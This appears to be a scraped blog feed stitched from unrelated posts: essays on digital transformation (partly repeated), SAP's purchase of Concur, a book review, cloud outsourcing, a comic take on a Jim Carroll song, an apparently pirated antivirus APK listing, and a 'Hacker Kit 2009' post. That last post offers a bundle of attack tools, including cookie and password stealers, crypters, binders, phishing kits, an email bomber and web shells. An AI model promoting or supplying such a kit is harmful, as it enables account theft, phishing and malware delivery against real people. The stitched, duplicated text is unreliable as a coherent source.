The present era of business is seeing lot of excitement and promise all around. Around the world, every day in our lives bring lot of changes – fast, unpredictable and may times we have to struggle hard to understand what the change stands for. Globalization, technology has transformed the playing fields across continents, industries and sectors. Very powerful forces of change have shaken the beliefs in many aspects of governance and social thinking. Fortune 500 companies list is changing faster than the fast pace that we have seen in the past. Powerful brands have suffered huge damages and many industries have gotten transformed substantially so much so that many successful leaders today claim their business need to adapt and transform faster than ever. Leading edge corporations run faster in this direction to ensure that their rate of change inside is ahead of the change seen in their external environments. Looking at these developments, it’s clear that the time to re-imagine the future is now, and it is best done by a fresh school of thought that governs our thinking frameworks to enable a fundamental rethink and envision what is desirable and sustainable. For some of the enterprises, it looks like embarking on a massive digital initiative would help meet some of these opportunities and challenges.

One of the most opportune moments in business today is the ability to strike really big in the digital space. The opportunities provided by digital structural change are really far reaching and there’s every indication that such initiatives will get more bold and impactful in the future. The reach and virulence of such initiatives become more evident when it can be seen that everyone can participate in varying capacities in the digital space so long as they have access to the internet. In the word of myriad type of configurations, it can be seen that flexible and varied relationships are formed between people and their diverse identities in the online and offline worlds. This also throws itself amenable to experimental forms of participation and such collaboration will become more pronounced in the medium term, which will continually influence the value creation process in many firms. Digitalisation is thus changing our social and economic lives as well as the way that we interact with one another and how corporates and individuals (have to learn to) handle (personal) data in future.

The larger risk that corporates face in this sweeping wave of digitalization is one of existence. If they do not manage to change and succeed in the digital world, they will be out of market over a period of time. The question then is who are at risk and to what degrees and how to mitigate the risk while capitalizing on the opportunity to grow in this age? The road to survival for several longstanding players is thus paved with painful consolidation measures and cost-intensive reforms that are; however, important in ensuring they hold their own in the new competitive environment of the future. The increasing adoption of digital models and technologies give rise to new market entry opportunities, particularly for corporates who can leverage technology in their core operations. As in the case of a market changing and a new market emerging, the attractive opportunities for the new players, create and impose new norms of competitive pressure on the established players. Due to digitalization, many traditional firms are finding themselves exposed in some areas that could in turn develop into Achilles' heels. These vulnerabilities provide especially fast-growing internet firms with the opportunity to occupy certain market niches, both to monetize their digital content and make their own product range more appealing to an even wider audience. After all, the business world is ever dynamic, and the dynamism is heavily accelerated in the digital wave that’s engulfing the world of business.

A lasting change in consumption and media usage behavior has occurred. Today it is not always about ownership and possession, but more often only about access to products and services. For some time, lots of small technology-driven start-ups and niche operators active in the markets that are also fighting with the incumbents for market share. In addition, the internet behemoths have been spreading their wings/ influencing the business models across various industries and services,, investing billions of dollars, experimenting in diverse markets – increasingly also outside their core business – and offering new especially digitalized business models. Competition is therefore intensifying appreciably in many sectors and in many markets.Sharing assets, services, and time are known elements; in fact the “sharing economy” is not new, but the internet is accelerating its penetration into daily life. The sharing economy is a phenomenon created by individuals seeking to provide flexible services, lower costs and generate profits; it works because it creates more favorable economics when parties share underutilized assets. In this model, the ability to scale up the business is related more to imagination and not just around asset ownership.The publishing sector is now offering e-books on demand (Scribd, Kindle Unlimited); in the music and film segments digital content is increasingly being streamed (Spotify, Amazon); accommodation is being offered and organized globally by private individuals (Airbnb); projects and start-ups are obtaining finance via the crowd (Seedmatch, Kickstarter) and the mobility and local public transport sectors are also seeing alternative, web-based business models being offered (Uber, Lyft). Add to this the consumer’s desire to be globally minded, sustainable, and adventurous and valuable. This shift in consumer behavior towards welcoming services and sharing assets with strangers was born out of the peer-to-peer marketplace model first introduced by internet companies like eBay, Craigslist, Napster, Wikipedia, YouTube, and Ask.com. The business ideas behind them are often not really new in and of themselves, but they are based on digital value creation processes. In addition, the new players speak the language of the internet. “Convenience”, ubiquitous access across channels and “one-stop shop” are the key ideas. The economics behind this is relatively simple: digital value creation processes can be managed much more cost efficiently and wider (customer) reach is achieved faster thanks to economies of scale and network effects. In dynamic markets with shorter product life cycles these are valuable competitive advantages.

Ofcourse, some of these modern developments are still in their infancy and require an appropriate regulatory framework in order to be able to achieve their full potential. Various parts of the word is just seeing some maturity regarding applicable laws for the internet. The challenges include finding ways of usefully integrating modern technologies and methods into people's daily lives without violating freedoms, without discrimination, competition infringements or tampering taking place or without increasing people's fear of being spied upon. On account of the many varied interests and the international nature of the products and services, however, (national) legislation pertaining to online issues often has a limited impact.Many new player have their noses in front in many markets because from the outset their business model concepts have been “digital”, as have been the structuring and regular development of these models. These digital players can expose their offerings as services to their ecosystem, enabling collaboration amongst with partners and sometimes competitors. This makes them fast and flexible in their reaction to market needs but most importantly they change the dynamics of the business as a whole. The consumers benefit a lot and they begin to demand more and more. It is apparent that many of the traditional general firms can be found to be lagging behind the new players with regard to implementing the necessary digitalisation of their various marketing and communications channels and of preferring to work on siloed solutions instead of subjecting their processes to radical innovation therapy. The battle for the wallet share of digital customers is in full swing and is so intense that many established companies are (still) not adequately prepared for it.

With the digital ecosystems currently in place the firms operating online are relatively small in number, but they command a relatively strong position in the market. All the same, many small start-ups as well as niche operators are providing valuable stimulus to the market, but it is not uncommon to see them serve as attractive takeover candidates for the wallet rich or bigger digital players. However, although some digital firms and some start-ups are currently (still) leaders in modern technologies and data analysis – the battle for customers and market share in the digital age has only just begun. Internet behemoths like Google, Facebook were also small when they started out. Of course they enjoy a certain lead in information and expertise with respect to algorithms and data analysis.The wannabe’s and the ambitious enterprise must begin planning the digital re-imagination of their businesses now – just as companies like Netflix/Amazon did long time back. Established companies in these sectors will be challenged by outsiders and newcomers that aren’t burdened by legacy business models and assets. Just as online publishers are trying to displace established publishers, Netflix displaced Blockbuster companies in sectors with high digital intensity should expect serious incursions into their markets. In contrast, companies whose offerings and customer experience can’t be replaced by a digital version – think Disney World – might focus less on digital reimagination and more on transforming the offering they provide today, as Disney is doing with its theme park digital initiative or like in the case of a bank/insurance company leveraging digital technologies to the hilt in providing services to their customers. . The strategy in this case may be more about digital transformation. These companies – especially ones with big investments in physical assets – must find ways to use digital technologies to give customers a better experience with products and services (e.g., a trip to a Disney resort) that they already value.

Many online innovations are incremental in nature and emerge largely via trial and error. However, they require investment, scope for experimentation, scope for freedom as well as scope for creativity and error tolerance. Traditional firms, too, must continually adapt and improve their capabilities for this. After all, there is no magic bullet for innovations in the internet age. Just as in the analogue age, the people behind them are creative types who have good ideas, are courageous and prepared to take risks – and of course need a bit of luck. This is, however, not the main issue.it's a tribute to the accelerating accelerating digital phenomenon that some nations are now focussed on innovation-stimulating measures that includes an appropriate internet policy, improved immigration opportunities for skilled personnel, greater autonomy in the higher education sector or the rethinking of the (excessively) long periods for which intellectual property rights are protected in some sectors. With the limitless possibilities for upside in the digital world, the most often asked question is which is the right digital strategy for a company or a division of that company (if its business is quite different from the businesses of other divisions – different customers, different offerings, and so on)? We believe it depends largely on two factors - Digital affability of the company or division: This refers to the degree to which its core offerings, business processes (especially marketing, sales, and distribution),and market’s experience in using those offerings can get digitized. The sectors that have a greater digital intensity are banking & financial services, insurance, media and entertainment, telecommunications besides software Such companies are especially vulnerable to disruption, since their products can be fully digitized: payments made through a smartphone, movies streamed to a desk or tablet computer, software rented ‘by the tap’ from the cloud, and so on.

Like in every other evolving paradigm, clearly not all can get into the digital bandwagon and count results by the quarter - aside from the vision and sophistication of the program being attempted influencing the quality and upside of the outcomes, different sectors will clearly have graded adoption. while overnight quick ramp-up success stories will continue to show up, fact is that a complete digital canvas as a reality for all industries will take its own time. Apart from the inertia inside enterprises, investment size, regulations, market acceptance of digital offerings will play a big role in shaping their digital journey. There may be some industries that may not see digital disruption in some parts of their business - like in the utility business with massive assets and providing everyday service to customers, but these companies need to exploit digitalization for providing better experience - which in turn could beget huge upsides in their top lines and bottom line. Like Uber experience or IoT enabled Barbie toys almost redefining the core of the business, automobiles and wearables embracing digital, there are enough white spaces to conquer. It’s seen that in early adapters, digitization helps the enterprises to get closer to the customers and are redesigning the future of business. The gap in traditional customer engagement models will directly and the new avenues of interactions powered by technology will pave the way for the next wave of disruption. The best guideline to make this happen will be to build an ecosystem that will help us look at our products from the customer’s perspective, and help conduct easy business with everyone. Clearly, the question is not how and why,but fast becoming “when” but the answer is ready : it’s “now or never”.



          SAP Buys Concur - Interesting Mix!   

I have used Concur system for several years and had seen it evolve over time. Earlier this quarter, when I saw this announcement about Concur, Uber and AirBnb coming together, I knew that they are aiming big, given Concur’s active partnership with the likes of United, Marriott, IHG and Avis. There is definite meat behind the claim that “Concur has developed an open platform to connect the corporate travel ecosystem, such as airlines, hotels and car rental companies in new and innovative ways”. After all big things like industry disruption happens through convergence of forces and in the software and services industry could mean that either a platform or ecosystem interplay bringing in differentiated experience or results. And that Concur was looking for a buyer was there in the air for a while.

SAP buying Concur is a decent positive decision in my opinion. As someone who travels a lot on business, I can tell you nothing endears this class of users than an enterprise class application working with the smooth and suave ways of working with consumer applications. The number of people waiting for such application could run into huge numbers. The scope and reach of this application does not stop with the current outline that we see but can expand horizontally to cover many more things, with substantial scope for innovation and the ecosystem expansion. The target industry is seeing growth in multiple dimensions - players like Uber expanding internationally and the likes of airbnb seeing manifold increase in transactions routed through Concur,indicates which direction things can move -only up.

Look at the SAP enterprise cloud footprint- Success factors from HR angle, and along with Ariba on the supply side and their huge user base leveraging core budgeting and finance apps- SAP is building a rich portfolio. Plus, there’s a HANA angle to this.

- I think HANA powers the analytics for Concur, or else this can happen soon.

- The HANA approach that’s already pushed heavily with SuccessFactors and Ariba will add the non transactional part of Concur - its safe to expect that ConcurInsights will be an early target to move to HANA completely.

- Concur messaging embracing HANA would be an interesting possibility as well.

- At present, Concur has integration interfaces with various platforms -Netsuite, Salesforce, etc including SAP systems.It can be expected that Concur connectors for HANA Cloud Integration , a predictable path simialr to the standardized connectors for SuccessFactors, already in place, gets repeated.

- Concur has some wannabe solutions that could be replaced by larger Ariba network solution in the spend management space and together could become part of the business network solution for enterprises.

-The Concur App Store is impressive and has an impressive array of partner applications. That early vision of building such a tight ecosystem with big and small payers, am sure got Concur’s founders rich returns today, Its not easy as a small niche player to go and sell to large enterprise and consumer players to be part of an ecosystem driven by them.

- With millions of users, now leveraging Concur’s platform , their data analysis on travel and entertainment provides unique insights - such as ancillary expenses are more than main expenses. The range and depth of insights could be a powerful data set that could become a service and a reference benchmark as well.

- The combined power of 50 million cloud users coupled with API strategies that they can be exploited would mean that the platform can substantially expand and begin to create a new robust ecosystem of its own - much more powerful at one level than the traditional SAP core app user base.

While it’s clear that buying Concur may not add to SAP profits immediately while pushing its topline by 700 million USD ,they key to note is that this is cloud stream based revenue and typically would grow substantially faster and is more sticky and predictable. The range of services that can be extended to make user experience more rich, relevant and engaging is enhanced substantially helping launch and release of new features and functions more effective, helping in the process to earn more returns from the customers. This also expands on the impact of SAP Ariba acquisition as the value of the transaction handles increases to 600 billion annually, a very high number by any standard. This is a major fillip for SAP’s foray into digital business, an agenda being pursued for last several years, starting with Ariba. Let’s look at this form another lens - the enterprise software industry is undergoing such a massive change - the speed of the change and the range of the change in the business models are truly mind boggling.

The tech ecosystem is itself changing fast. The rapid convergence of forces make it more potent and the traditional boundaries and model of operation - centralized system to a more open and partnership based ecosystem makes building digital business systems more attractive commercially and more scalable in its reach. While the traditional challenges of integrating Concur teams and solutions will definitely exist, SAP is now wiser having digested the likes of Ariba in the past. 8+ billion dollars for acquiring a company at 10x projected sales is not small money, by any standards. Concur is also the owner of TripIt, a travel management tool that has widespread use. TripIt has been independently run post the acquisition by Concur, and is said to have grown rapidly ever since. The current SAP users or Concur users may not see any immediate benefit of this acquisition, given the evolved services that Concur and SAP have. SAP has made some bold moves to become a player in the cloud space. The greater opportunity for SAP lay in reimagining the complete ecosystem that it has built over the last 15 + years to help in redefining their positioning as the leading enterprise cloud player. Indeed, this is an interesting journey ahead.



          Redefining Digital Enterprise(s) by Reimagining Possibilities   

Karl Heinz Streibich is the CEO of Software AG – a very well-known name in the technology industry has now come up with a book titled- The Digital Enterprise, bringing out the moves and motives of Digital Leaders.

Fellow Enterprise Irregular and a great friend Vinnie Mirchandani has narrated this impressive book due for release shortly. Vinnie shared an author copy of the book weeks back and I was so impressed by the book - read and reread the book and I feel good sharing my thoughts on the book – topic and details therein.

The present era of business is seeing lot of excitement and promise all around. Around the world, every day in our lives bring lot of changes – fast, unpredictable and may times we have to struggle hard to understand what the change stands for. Globalization, technology has transformed the playing fields across continents, industries and sectors. Very powerful forces of change have shaken the beliefs in many aspects of governance and social thinking. Fortune 500 companies list is changing faster than the fast pace that we have seen in the past. Powerful brands have suffered huge damages and many industries have gotten transformed substantially so much so that many successful leaders today claim their business need to adapt and transform faster than ever. Leading edge corporations run faster in this direction to ensure that their rate of change inside is ahead of the change seen in their external environments. Looking at these developments, it’s clear that the time to re-imagine the future is now, and it is best done by a fresh school of thought that governs our thinking frameworks to enable a fundamental rethink and envision what is desirable and sustainable. It’s in this context that this book and the examples therein make such a powerful effect.

Karl-Heinz Streibich in the opening chapter makes a passionate plea as to why every enterprise should become a digital enterprise. He points out that for several decades IT was used to make business operations efficient and over time felt the need to create systems of differentiation, typically achieved by integrating the enterprise and extending the integration to its ecosystem thereby reducing the barriers to conduct business.More recently, we see leading edge enterprises around the world focus on creating systems for competitive advantage by embracing digitization. Such enterprises, Karl-Heinz points out are embedding technology in their products and services, moving to technology - enabled business models and utilizing technologies to redefine business models and utilizing technology to redefine their distribution channels. And Karl-Heinz emphasizes that this happens in every industry. All IT products are today becoming digital products leveraging the technology growth from internet to data explosion to in-memory computing, big data, digital collaboration platforms and business process management. The entire chain of data generation, data analysis, data based decision making are enabled through digitization and with collaboration and machine-to-machine communications, enterprises gets enhanced power to execute business processes with unprecedented speed and insight, in real time. With the proliferation of cloud technologies, scale out and scale ups of digital programs are becoming an easy option to exercise for most to the enterprises and the journey of IT products to digital products happen rapidly, a phenomenon well exploited by leaders in unique ways across industries.

Focused on enterprise class innovation, the book is littered with powerful showcases – 22 guest perspectives and more than 300 innovation cameos representing more than 20 industries in more than 25 countries – end of reading the book, one gets the feeling of having gone around the world - for a change, across planets. Its magnitude and range is really wide and deep. The range of themes extend from creating smarter products to inventing new go-to-market models to transforming your value chain to reexamining your stakeholders and there are many more that I have not included herein .

Some cases therein:

- Coca Cola Enterprises talks about mobility and crowd sourcing being brought together to create new industry frameworks to monitor inventory, shape merchandizing and improve service levels, while increasing operational efficiencies.

- Nissan talks about how by Steering –By- Wire, an aviation feature is brought onto their Infiniti range of vehicles

- A Spanish Auto Insurer shares how satellite technology leverage is transforming their Insurance industry

- Deutsche Telecom talks about how it is transforming itself from a pure communication provider into a new future centric business with innovative offerings

- Siemens AG highlights how Germany’s concept of “Industrie 4.0”leveraging continuing transformations of the internet into a network that lets objects, devices, machines and systems communicating with one another driving fundamental changes and how this could lead to the integration of digital and real worlds on a Digital Enterprise Platform.

- Dr Henning Kagermann, former CEO of SAP and currently president of Acatech, the German National Academy of Science & Engineering talks about how more stakeholders are influenced by technology than in the past and how digital enterprises would need to factor in a much wider set of stakeholders.

The exhaustive cases mostly presented by the enterprises directly make deep impact and helps visualize a variety of possibilities. The best part is that these do not necessarily come from the Silicon Valley, where I live but from industries located across the developed world. These Main Street logo’s are indeed taking “digital” to a whole new level – way, way beyond the plain interplay of social, mobile, analytic and cloud computing.

Marc Benioff in his brilliant preface to the book brings out the point that digitization helps the enterprises to get closer to the customers and are redesigning the future of business. He talks about how GE ‘s GEnx engine –currently flying on Boeing’s new 787 Dreamliner is a connected product that provides real time data about engine performance from both GE and the airline customers to communities of service technicians. Service teams on the ground can access the data while the plane is still air-borne , facilitating a new range of services .Philips , Toyota are all leveraging unique models of digitization to serve their customers better/enable new lines of business for them.

The magnitude of this becomes apparent when a top GE executive writes in the book that in a few years from now 50 billion devices could get interconnected, making giant strides in remote monitoring , self-healing etc. , thereby improving the overall quality of business. These trends will provide for massive paybacks and GE sees US$15 trillion added to global GDP in the next 15 years. That’s the approximate size of US economy today!How can enterprises start their digital journey is a natural question in the mind of everyone reading this – the book promises that any enterprise can master the challenge of reinventing itself as a digital enterprise, The concept of “Digital Babies” Digital Natives” and Digital Phoenixes” provide a context to check an enterprise’s digital journey. The Digital enterprises, the book closes by arguing have to be continuously thinking about their “Next Big Thing”. With increasing customer expectations, competition catching on capabilities faster, ever evolving industry standards and government regulations The pace of technological progress is relentless and the resultant digital enterprise landscape in future will look very different from what it’s today and claimants to the future need to start their journey today and pace up.. or will run the risk of getting grounded fast.

Though a lot of attention these days seems to go to innovation in mobile and social technologies, plenty of complex, hairy “industrial innovation” is also going on. This is encouraging because we face a daunting series of challenges at the global, enterprise, and individual level. We need winners leveraging digital forces and come out successfully to help deal with a range of challenges – big and small, of various size and structures and across geographies. Let's looks at the new business that are shaping many emerging industries - The successful enterprises spanning established corporations to upcoming start-ups—are creating incredible value by succeeding in a new way: by bringing together various streams of technology to create new form of processes, products and services to create value . These are the poster child of digital enterprise success.

The key learning’s for me out of reading the book is the need to completely re-visualize the possibilities by becoming a digital enterprise. That calls for going beyond creating revenue .by mere digital substitution. A digital strategy that focuses on specific business outcomes leveraging various forms of digital technologies can create an edge for the enterprise. It must be noted that a sustainable edge comes in where the inane physical resources mutate with the vibrant digital information to create new value. Winners in doing this get there by thinking big and small together transforming processes, creating/validating/rebooting business models and enabling new waves of customer experience. Any company large or small, old or new can use this digital technology to create a winning edge for its business and perhaps, its industry.

What I see in the book,The Digital Enterprise are a rich set of examples and metaphors that talk the story of entrepreneurs, business leaders, and multinational companies innovatively leveraging technology to tackle big problems, “grand challenges,” In their own ways, these big and small enterprises in their spheres of influence are reshaping the world


          Cloud & Outsourcing Service Providers   

Far too often, am asked the question – Won’t cloud disrupt the outsourcing vendors in a big way. My answer is Yes & No. Yes. The cloud will definitely impact those outsourcing vendors who just wait and watch or do superficial adjustments to the emergence of cloud. For those outsourcing vendors (just like in the case of all the players in the software ecosystem), trying to understand the impact of the cloud and proactively embracing the cloud, the impact is going to positively felt. Let’s examines this further. It’s clear: The cloud’s impact on outsourcing over the next five years will be profound because “it will significantly influence the demand made on the nature of services and the type of expertise built by service players as seen in the industry today. On an As-Is scenario, one of the key changes would be that the demand on labor will go down – as cloud could cut down need for support processes while enabling near real-time data processing across the value chain for business”. At the same time, the disruptive cloud technology can enable whole host of new business opportunities centered on new business and technology and support execution models hitherto just dreamt of.

Zoom forward: The beauty of the cloud technologies is such that overtime, it would be seen that cloud technologies will enable IT service providers to deliver end-to-end services regardless of the various platforms, applications, and technologies involved. Extend the thought – one can easily see that within enterprises the classification of core/non-core would begin to diminish overtime as cloud enables Enterprise IT to act as a hybrid environment of on-premise, private cloud, and public cloud services.
The cloud-based services will change outsourcing contract methodologies. “Buyers will move away from long-term contracts where the return on investment depended on continuous improvement, and move to shorter-term contracts with more flexibility to quickly buy new services. In respect of some business functions, the complexities involved in structuring a deal centered around cloud would encompass requirements like providers promising to take over customer infrastructure and run it from their shared centers to minimize multiple cloud vendor management for customers”. Cloud-based services will also cause an evolution and huge change in the way outsourcing providers price their services.

There are various types of cloud-related services that outsourcers will typically provide:
• Consulting around integrating enterprise IT with private and public clouds to create a hybrid environment
• Organization change management & risk management
• Implementing and managing private clouds to consolidate and optimize infrastructure
• Developing custom applications for the emerging cloud software platforms
• Developing new applications that integrate collaboration, communication, and cloud platforms
• Migrating enterprise applications to the cloud and the related testing, certification, and governance for risk and compliance
• Offering many commonly used functions as –a –service
• Governance mechanisms, regulation compliance
• Making Business –IT alignment realized over time.

In its fully evolved state, service providers will take on the role of a trusted partner to integrate cloud services of multiple service providers with Enterprise IT. Outsourcing providers are going to move up the value chain, offering consulting and information management services — not in the actual delivery of IT but in how buyers should provision and organize their systems and business process workflows.

Services providers that focus on providing services at the lower levels of the infrastructure and platform stack will need to become more agile and nimble to new technologies and faster technology cycles. They will have to provision new services as quickly as their cloud computing alternatives. The ease with which users can access social technologies, mobile devices and SaaS technologies will mean that IT and outsourcing partners will be bypassed, leaving a myriad of contract support challenges. Inevitably, outsourcers will have to support new technologies and do so in a far more rapid manner. This will lead to tactical responses by outsourcing providers for example leveraging service catalogs to provide a range of computing alternatives and service options to business users (including dedicated, shared and cloud services at different prices and service alternatives). But the real change is one of drastic business model change from hierarchical command structures to a modularized, configurable set of services that can be provisioned to clients in a rapid fashion.

Cloud Computing challenges services providers to sell beyond IT - . Service providers that own the IT budget do not have the relationships to effectively sell many of the cloud enabled business services that are emerging, as they require IT, business and executive relationships – and of course process knowledge. “Upwardly mobile” services providers capable of selling at the process layer will become aggregators of on-premise and Cloud IT technologies within hybrid environments.

If a service provider’s revenue is dependent on increased resource consumption as defined by resource units (e.g., managing more servers) any move to the Cloud most likely will result in a net reduction in resource consumption as infrastructure is consolidated, automated and virtualized.
Overall, I think Cloud Computing is about to bring a lot of changes to the traditional Outsourcing world with a few challenges such as security which is slated to have crossed the tipping point and is poised to put customers at greater risk at the cost of low-cost cloud alternatives that today present themselves as the new-world outsourcing parties.
Nevertheless it will accelerate offshoring / outsourcing, in my opinion because:
- It will drive the traditional outsourcing parties to adopt faster nimble methods

- Contract cycles and agreements will have to be revisited as niche core cloud service players will go after the buyers as contract renewal approaches.

- Fixed Contracts will come under fire as demand of variable contracts will increase. Traditional vendors will have a problem as their models are based of one-time fixed with incremental charges while with hardware/software costs dropping dramatically customers will end up paying more

Cloud computing is surprisingly incremental – software provides a potential risk, hardware provides a potential risk but platform as a service offerings and ability to tap huge new markets tilt the scale. We believe cloud models, like SaaS, will take more years to go mainstream in a true sense of the term, ie, relative to the size of the overall software market. This implies that while SaaS has already displaced traditional software in some categories (eg, CRM), a widespread shift will only be gradual. This provides a window of opportunity for IT-services vendors. Newer offerings like platform BPO adds to the service provider pie. Platform BPO can be described in many ways. For example, it can be considered a SaaS model implemented across a business process, or something akin to “process as a service”.

In effect, platform BPO is about:
- Automating a business process to ensure lower dependence on manpower resources;
- Hosting that process on shared infrastructure (of the vendor or rented by the vendor) rather than on the customer’s premises;
- Pricing the offering on a transaction-based model rather than on a cost centric - people deployed model;
- Sharing of the core platform across many customers (multi-tenant) rather than proprietary to a single customer. Platform BPO is, thus, a new way to deliver processes that have already been around, and it is much influenced by the emerging cloud-computing concept.

Three years from now I would say a good number of enterprises will have their strategies in place for how they plan to use the cloud. The smaller the enterprise the greater the potential exploitation of a third-party cloud will happen. The larger customers will likely use cloud-like technologies, but internally private clouds. Our customers are unlikely to use any public platforms except for what they would deem as commodity activities, such as payroll, F&A, HR, etc (not core strategies). How does that impact companies like us? Large enterprise market, our predominant market space, is likely to adopt cloud technologies internally, and try to charge back their internal clients/departments on a cloud-like billing pattern. Therefore, they would like to reduce the complexity of what they have to take advantage of the variable costs from a costing perspective. In a three-year timeframe that will be a substantial transformation for a lot of companies, which translates into opportunities for people like us.

On a three to five-year perspective, most of the enterprises will be transitioning to a cloud-based delivery strategy for tech and services. Not likely too big, as big a transformation as ERP, CRM, etc as it will be technology-driven transformation on the inside. Business benefits that the end user will see will be greater efficiency, from infrastructure, hardware perspective. There will be a better sharing of resources. What we are seeing in a lot of pilots is speed. Change and speed will be much better in a cloud environment.

And that provides an opportunity for outsourcing service providers when it comes to cloud integration, cloud enablement of existing applications or creating new applications all together on the cloud.

As long as the outsourcing partners’ providers continue to be innovative, and adapt themselves to the market conditions, there should be no room to get worried. After all, the outsourcing service providers do carry with us the knowledge of the applications, ecosystem and architecture for the customers we operate with. Value gets created only by assisting the end client in their business process. In its true sense, value is not just created by cloud infrastructure providers, as they are only going to commoditize the data centre service.

So, overall, well run offshore headquartered firms shall see net positive opportunities with large enterprises embracing the cloud.


          Comedy in a Casket   

Upon the recent death of Jim Carroll, revisiting his seminal rock-punk classic, 1979’s Catholic Boy, I couldn’t help but recall how funny I used to think that album’s most popular single, People Who’ve Died, was, and, I’m afraid, still is – even after Mr. Carroll’s sad passing.

The 5:07 song is a literal roll call of people in Carroll’s life who reportedly did die, each one seemingly in a more onerous, chilling, Gorey-like manner than the one before – all so bluntly described, the spirit of Raymond Chandler animating Carroll’s cadaverous prose.
     It is this deceptively clinical approach to a subject a lesser artist might have softened with the padding of metaphor – or simply approached as a tear-stained ballad – that makes Carroll’s manifesto so powerful, so lasting – and so damn funny.

Teddy sniffing glue he was 12 years old/Fell from the roof on East Two-nine/Cathy was 11 when she pulled the plug/On 26 reds and a bottle of wine/Bobby got leukemia, 14 years old/He looked like 65 when he died

Isn’t that terrifyingly intimate?
     So clearly written in deference to the harrowing punches these deaths must have delivered to the poet/singer?
     And isn’t that what makes this song so good – so very good it all but becomes a parody of itself, its colorful, Marvel Comics-like parade of names, trumping each other, building the heavenward arc of the song’s emotional architecture?

G-berg and Georgie let their gimmicks go rotten/So they died of hepatitis in upper Manhattan/Sly in Vietnam took a bullet in the head/Bobby OD'd on Drano on the night that he was wed

It’s this tangible itch, one the song never fails to deliver, that made me see the comedic possibilities in transferring it to a skit featuring a high school cheerleading team practicing their interpretation of the song for a charity fund, one founded to honor (what else?) students who have died.

Like my old associates in high school, one who, only a week before graduation, perished in a motorcycle accident that left him all but indistinguishable from a stretch of dark country road just a mile from my house – Johnny Blaze forever now Ghost Rider – the other, eaten from within by cancerous cells.

Jonny took a dive from his bike/Joey caught something his body didn’t like

Despite the presumably unintended gallows humor of the lyrics, it’s Carroll’s mortuary voice that gives his song its universal connectivity – sounding like Lurch reading the contents of his mother’s will.
 
This is what I would exploit in my high-octane comedy skit, a “guaranteed-hilarious” send-up of small town morality – and mortality.
     Each death would receive its own series of mimed motions, Bobby OD’ing with Drano on his wedding night – summed up with a subtle slide of a ring onto a finger, followed by a smooth lift to the mouth with the drain cleaner – and then back into the repeating chorus, where each girl crosses her heart and prays, before falling backwards, dead as a cartoon, mimicking crosses on her eyes, right into the arms of the girl positioned behind.
     Of course, all of this has to be performed with the sincerity of Soupy Sales tending a custard pie – to break from such would ruin it.
     Add to this a lovingly out-of-tune head cheerleader – Olive Oyl at the opera – an overly-enthusiastic, effeminate male coach – Richard Simmons playing Richard Simmons – and a plethora of poms-pons – and you’ve got comedy platinum.
     I kid you not.

Mary took a dry dive from a hotel room/Bobby hung himself from a cell in the tombs/Judy jumped in front of a subway train/Eddie got slit in the jugular vein

Jim Dennis Carroll.

What a funny fucker.

Born to spew lavender – all the anger and mistrust a world has to offer – with all the mannered pomposity of Bob Newhart – playing God – picking through the dead, describing the depths of a Catholic Hell.


          Opening Salvo   

Today on the 5: Apple is clearly backing the retina display in a big way. I wonder what that's going to mean once everyone starts jumping on board. There are some big implications that may come about once people start looking for content to exploit those beautiful pixels.


          Politicizing Vets   

Today on the 5: I almost didn't record anything for Memorial Day, because I just didn't know if I had anything to say on the subject. As the weekend went on, however, I started to see something that bothered me more and more. For a group of people that are ostensibly our most honored, it sure seems like veterans get exploited for political reasons more and more.


          AntiVirus PRO Android Security v5.5.0.1 {KatCore}.apk   

ScreenShot


http://extraimago.com/images/2016/07/29/1b76be.jpg

http://extraimago.com/images/2016/07/29/24c041.png


AntiVirus PRO Android Security v5.5.0.1 {KatCore}.apk


Get AVG AntiVirus PRO Android™ Security now for premium, full featured protection from viruses, malware, spyware & online exploitation in real-time.


Download NOW with just an easy 1-time payment and join over 100,000,000 people who already installed AVG’s antivirus mobile security apps!


With AVG AntiVirus PRO Android Security you can:


 Scan apps, settings, files, media, calls & text messages (SMS) in real-time

 Enable finding/locating your lost or stolen phone via Google Maps™

 Lock & wipe your phone to protect your privacy

 Kill tasks that can slow down your phone

 Browse the web safely and securely

 Monitor battery, storage and data package usage

 Filter & block unwanted calls & text messages (SMS)


In addition, when installing the premium app, you also get:


 App Lock - password protect app access

 App Backup - backup apps from your device to your SD

 Camera Trap - discreetly emails you a photo of anyone trying to unlock your phone

 Device Lock - locks your phone whenever the SIM card is replaced


AVG AntiVirus PRO Android Security also:


 Defends against malicious apps, viruses, malware and spyware

 Identifies unsecure device settings and advises on how to fix them

 Helps ensure contacts, bookmarks & text messages are safe

 Checks media files for malicious software & security threats

 Guards you from phishing attacks


App features:


Protection:


 Scan downloaded apps & files and remove malicious content

 Search, shop & use social networks with peace of mind knowing your identity & personal data are protected from phishing & malware

 Scan websites for harmful threats. If a suspicious URL is detected, you will be redirected to a “Safe Page” (applicable only to Android's default browser and Chrome)


Performance:


 Kill tasks & processes that can slow down or freeze up your device

 Monitor battery consumption, set battery level notifications & enable power saving

 Monitor traffic - keep track of your 3G/4G mobile data plan usage by getting notifications when you are near to reaching your monthly data plan limit

 Optimize internal & SD card storage space by either uninstalling apps and games or by moving them between the internal device memory and SD card


Anti-Theft & Phone Location:


Use AVG’s remote management console or text messages (SMS) to:

 Locate your lost or stolen phone and get help finding it via Google Maps™

 Lock your phone and set a lock screen message to help the locator find you

 Make your phone ring (shout) even if it is on silent mode

 Wipe your phone and SD card content

 Camera Trap: discreetly emails you a photo of anyone who enters 3 wrong passwords when trying to unlock your phone

 SIM Lock: automatically locks your phone whenever someone replaces your SIM card


Privacy:


 Privacy status management: delete call history, clipboard content and browsing history (Chrome) and protect sensitive apps

 App Lock: lock apps to protect your privacy and safety or lock your device settings to secure its configuration

 App Backup: backup apps from your device to your SD card so you can restore them whenever necessary

 Call and Message Blocker: protect yourself against spammers, hackers and scammers. Get warned about suspicious text messages, filter and block unwanted calls and messages

* SMS Blocker isn’t available for devices with Android v4.4 and newer

 Wipe contacts, text messages, photos, browser history, calendar, format SD card, and restore mobile device to factory settings


          Hacker Kit 2009 - Daily Hacker Tools [56mb]   
Hacker Kit 2009 - Daily Hacker Tools [56mb]

Some tools which hackers require in daily life. I personally use most of these.

Yahoo Account Locker
Acunetix Vulnerability Scanner + Crack
Admin Finder
Auto Surfer
Angry Ip Scanner
Anonymity Pack
Ardamax 28 and 2.9 + serial
Binders
Brutus
Crypters
Cookie Stealer
Debugging Tool
Email Bomber
Exploit Scanner
Ip Scanners
Irc Spammer
Md5 Cracker
Msn Freezer
MySqli Dumper
Passstealer - Istealer 5 and other fud stealers
Phishers - A to Z
Port Scanner
Shells Pack A to Z shells
Supernova 5
Telnet Tools
Xss scanner
zer0 server Attacker


Download:
